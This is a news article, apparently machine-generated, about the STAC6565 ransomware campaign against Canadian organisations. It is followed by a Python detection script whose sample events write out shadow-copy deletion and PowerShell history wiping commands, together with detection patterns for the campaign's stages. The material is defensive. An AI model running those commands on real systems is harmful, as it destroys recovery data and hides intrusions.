Ethical Hacking News
STAC6565: The Canada-Targeted Ransomware Campaign Blurring the Lines Between Cyber Espionage and Ransomware. In recent months, a sophisticated threat actor known as STAC6565 has been actively targeting Canadian organizations with a campaign of high-profile ransomware attacks.
STAC6565 is a sophisticated threat actor targeting Canadian organizations with high-profile ransomware attacks. The group relies on spear-phishing emails and exploits vulnerabilities in legitimate software applications to evade detection. Most attacks target HR personnel, tricking them into opening malicious documents disguised as resumes or cover letters. STAC6565 uses various tools and techniques, including the RedLoader malware, to carry out its attacks and gather sensitive information about the target organization. The group's tactics have been documented by researchers and show a mix of data theft and selective ransomware deployment via a custom locker named QWCrypt.
In recent months, a sophisticated threat actor known as STAC6565 has been actively targeting Canadian organizations with a campaign of high-profile ransomware attacks. According to cybersecurity experts at Sophos, this particular group has managed to evade detection for quite some time by leveraging recruitment platforms and exploiting vulnerabilities in legitimate software applications.
The primary vector used by STAC6565 involves spear-phishing emails designed to trick HR personnel into opening malicious documents disguised as resumes or cover letters. Since November 2024, the attackers have leveraged popular job search platforms like Indeed, JazzHR, and ADP WorkforceNow to upload weaponized resumes as part of a job application process. This approach not only increases the likelihood that the documents will be opened but also allows the threat actors to evade detection by traditional email-based protections.
"It's an unusually narrow geographic focus for the group, with almost 80% of attacks targeting Canadian organizations," said Sophos researcher Morgan Demboski. "Once focused primarily on cyber espionage, Gold Blade has evolved its activity into a hybrid operation that blends data theft with selective ransomware deployment via a custom locker named QWCrypt."
The group's tactics, techniques, and procedures (TTPs) have been extensively documented by researchers at Huntress, eSentire, and Bitdefender. According to these reports, STAC6565 has been observed using various tools and techniques to carry out its attacks.
One notable tool used in the campaign is RedLoader, which sends information about the infected host to a command-and-control (C2) server and executes PowerShell scripts to collect details related to the compromised Active Directory environment. This allows the threat actors to gather sensitive information about the target organization without needing physical access to the network.
RedLoader has been observed in several delivery sequences, in September 2024, March/April 2025, and July 2025. These sequences often involve a ZIP archive that contains a Windows shortcut (LNK) file impersonating a PDF. This LNK file uses "rundll32.exe" to fetch a renamed version of "ADNotificationManager.exe" from a WebDAV server hosted behind Cloudflare Workers.
The attack then launches the legitimate Adobe executable to sideload the RedLoader DLL (named "srvcli.dll" or "netutils.dll") from the same WebDAV path. This DLL proceeds to connect to an external server to download and execute the second-stage payload, a standalone binary that's responsible for connecting to a different server and retrieving the third-stage standalone executable alongside a malicious DAT file and a renamed 7-Zip file.
These payloads rely on Microsoft's Program Compatibility Assistant ("pcalua.exe") for execution, a technique seen in previous campaigns. The primary difference is that the format of the payloads transitioned in April 2025 to EXEs instead of DLLs.
"The payload parses the malicious .dat file and checks internet connectivity," said Sophos. "It then connects to another attacker-controlled C2 server to create and run a .bat script that automates system discovery... The script unpacks Sysinternals AD Explorer and runs commands to gather details such as host information, disks, processes, and installed antivirus (AV) products."
The results of the execution are packaged into an encrypted, password-protected 7-Zip archive and transferred to a WebDAV server controlled by the attacker. RedCurl (another name under which the same group is tracked) has also been observed using RPivot, an open-source reverse proxy, and Chisel SOCKS5 for C2 communications.
Another tool used in the attacks is a customized version of the Terminator tool that leverages a signed Zemana AntiMalware driver to kill antivirus-related processes via what's called a Bring Your Own Vulnerable Driver (BYOVD) attack. In at least one case, the threat actors renamed both the components before distributing them via SMB shares to all servers in the victim environment.
While most of these attacks were detected and mitigated before the installation of QWCrypt, three of the attacks – one in April and two in July 2025 – led to a successful deployment. In these cases, the attackers manually browsed and collected sensitive files, then paused activity for over five days before deploying the locker.
The QWCrypt deployment scripts are tailored to the target environment, often containing a victim-specific ID in the file names. The script, once launched, checks whether the Terminator service is running before taking steps to disable recovery and execute the ransomware on endpoint devices across the network, including an organization's hypervisors.
In the last stage, the script runs a cleanup batch script to delete existing shadow copies and every PowerShell console history file to inhibit forensic recovery. This demonstrates the group's ability to refine its delivery methods and evade detection.
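The chain described above maps cleanly onto a handful of host telemetry detections. The following Python sketch is an added illustration written for this article, not code from Sophos or any of the cited researchers: it evaluates constructed Sysmon-style events against rules for the stages the text names (rundll32 fetching from a WebDAV path, the sideload DLL names loaded from outside System32, pcalua.exe proxy execution, a Zemana-signed driver load, shadow copy deletion and PowerShell console history deletion). The pipe-separated event layout, host names, file paths, and the assumption that shadow copies are removed with vssadmin or wmic are mine; ConsoleHost_history.txt is the file name PSReadLine uses for console history. It also computes the gap between the first delivery-stage hit and the first impact-stage hit, which the article notes was over five days in the successful deployments.

```python
"""
Detection sketch for the delivery-to-impact chain described in the article.
Added example for this page; not vendor tooling. Telemetry is constructed
Sysmon-style data, reduced to one pipe-separated line per event:

    event_type|timestamp|host|image|detail

event_type is ProcessCreate (detail = command line), ImageLoad (detail = loaded
DLL path) or DriverLoad (detail = "signer=<name> path=<driver>"). The field
layout, hosts and paths are assumptions made for the example.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample events (not real incident data) covering each stage.
SAMPLE_EVENTS = [
    # Delivery: LNK -> rundll32.exe pulling a renamed binary from a WebDAV share
    "ProcessCreate|2025-07-01T09:12:03Z|HR-WS01|C:\\Windows\\System32\\rundll32.exe|"
    "rundll32.exe \\\\cdn.example.invalid@SSL\\DavWWWRoot\\docs\\resume.exe,Start",
    # Execution: relocated executable sideloads netutils.dll from the same WebDAV path
    "ImageLoad|2025-07-01T09:12:09Z|HR-WS01|\\\\cdn.example.invalid@SSL\\DavWWWRoot\\docs\\resume.exe|"
    "\\\\cdn.example.invalid@SSL\\DavWWWRoot\\docs\\netutils.dll",
    # Execution: later-stage payload launched through pcalua.exe
    "ProcessCreate|2025-07-01T09:13:40Z|HR-WS01|C:\\Windows\\System32\\pcalua.exe|"
    "pcalua.exe -a C:\\Users\\Public\\update.exe",
    # Benign noise: the same DLL name loaded from System32 must not alert
    "ImageLoad|2025-07-01T09:14:00Z|HR-WS01|C:\\Windows\\System32\\net.exe|"
    "C:\\Windows\\System32\\netutils.dll",
    # Defense evasion, days later on a server: Zemana-signed driver loaded by a renamed tool
    "DriverLoad|2025-07-07T12:10:11Z|SRV-FILE01|C:\\Windows\\Temp\\svc.exe|"
    "signer=Zemana Ltd. path=C:\\Windows\\Temp\\drv.sys",
    # Impact: cleanup removes shadow copies and PowerShell console history
    "ProcessCreate|2025-07-07T12:15:30Z|SRV-FILE01|C:\\Windows\\System32\\vssadmin.exe|"
    "vssadmin delete shadows /all /quiet",
    "ProcessCreate|2025-07-07T12:15:31Z|SRV-FILE01|C:\\Windows\\System32\\cmd.exe|"
    "cmd /c del /f /q C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\"
    "PowerShell\\PSReadLine\\ConsoleHost_history.txt",
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SIDELOAD_NAMES = {"srvcli.dll", "netutils.dll"}  # DLL names given in the article


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


# (rule_id, kill-chain stage, event_type, predicate(image, detail))
RULES = [
    ("rundll32_webdav_fetch", "delivery", "ProcessCreate",
     lambda img, d: _basename(img) == "rundll32.exe"
     and re.search(r"davwwwroot|@ssl", d, re.I) is not None),
    ("sideload_dll_outside_system32", "execution", "ImageLoad",
     lambda img, d: _basename(d) in SIDELOAD_NAMES and not _in_system_dir(d)),
    ("pcalua_proxy_execution", "execution", "ProcessCreate",
     lambda img, d: _basename(img) == "pcalua.exe" and " -a " in d.lower()),
    # Assumption: signer string is available; production rules should key on the
    # specific vulnerable driver's hash or signature rather than the vendor name.
    ("byovd_zemana_driver", "defense_evasion", "DriverLoad",
     lambda img, d: "signer=zemana" in d.lower()),
    # Assumption: shadow copies are deleted via vssadmin or wmic; the article only
    # states that the cleanup script deletes existing shadow copies.
    ("shadow_copy_deletion", "impact", "ProcessCreate",
     lambda img, d: re.search(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete",
                              d, re.I) is not None),
    ("powershell_history_wipe", "impact", "ProcessCreate",
     lambda img, d: "consolehost_history.txt" in d.lower()
     and re.search(r"\bdel\b|remove-item|\brm\b", d, re.I) is not None),
]


def parse_event(line):
    """Split one constructed telemetry line into its five fields."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        raise ValueError(f"malformed event: {line!r}")
    etype, ts, host, image, detail = parts
    return {"type": etype, "ts": ts, "host": host, "image": image, "detail": detail}


def evaluate(lines):
    """Return one hit per (event, rule) pair that matches."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        for rule_id, stage, etype, pred in RULES:
            if ev["type"] == etype and pred(ev["image"], ev["detail"]):
                hits.append({"rule": rule_id, "stage": stage,
                             "host": ev["host"], "ts": ev["ts"]})
    return hits


def stages_by_host(hits):
    """Which kill-chain stages were seen on each host (for triage prioritisation)."""
    out = defaultdict(set)
    for h in hits:
        out[h["host"]].add(h["stage"])
    return dict(out)


def dwell_days(hits):
    """Days between the earliest delivery-stage hit and the earliest impact-stage hit."""
    def first(stage):
        ts = sorted(h["ts"] for h in hits if h["stage"] == stage)
        return datetime.strptime(ts[0], "%Y-%m-%dT%H:%M:%SZ") if ts else None
    a, b = first("delivery"), first("impact")
    return (b - a).total_seconds() / 86400 if a and b else None


if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
    print(stages_by_host(evaluate(SAMPLE_EVENTS)))
    print("dwell days:", dwell_days(evaluate(SAMPLE_EVENTS)))
```

The rules are deliberately stage-tagged so that a host showing delivery and execution hits is escalated before the multi-day pause the article describes ends in a locker deployment; the benign System32 load of netutils.dll is included to show the sideload rule keys on the load path, not just the DLL name.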
"The group maintains a comprehensive and well-organized attack toolkit, including modified versions of open-source tooling and custom binaries to facilitate a multi-stage malware delivery chain," said Sophos. "Gold Blade's abuse of recruitment platforms, cycles of dormancy and bursts, and continual refinement of delivery methods demonstrate a level of operational maturity not typically associated with financially motivated actors."
This campaign highlights the evolving nature of ransomware attacks and the blurring of lines between cyber espionage and financially motivated operations.
Related Information:
https://www.ethicalhackingnews.com/articles/STAC6565-The-Canada-Targeted-Ransomware-Campaign-Blurring-the-Lines-Between-Cyber-Espionage-and-Ransomware-ehn.shtml
https://thehackernews.com/2025/12/stac6565-targets-canada-in-80-of.html
Published: Tue Dec 9 04:04:04 2025 by llama3.2 3B Q4_K_M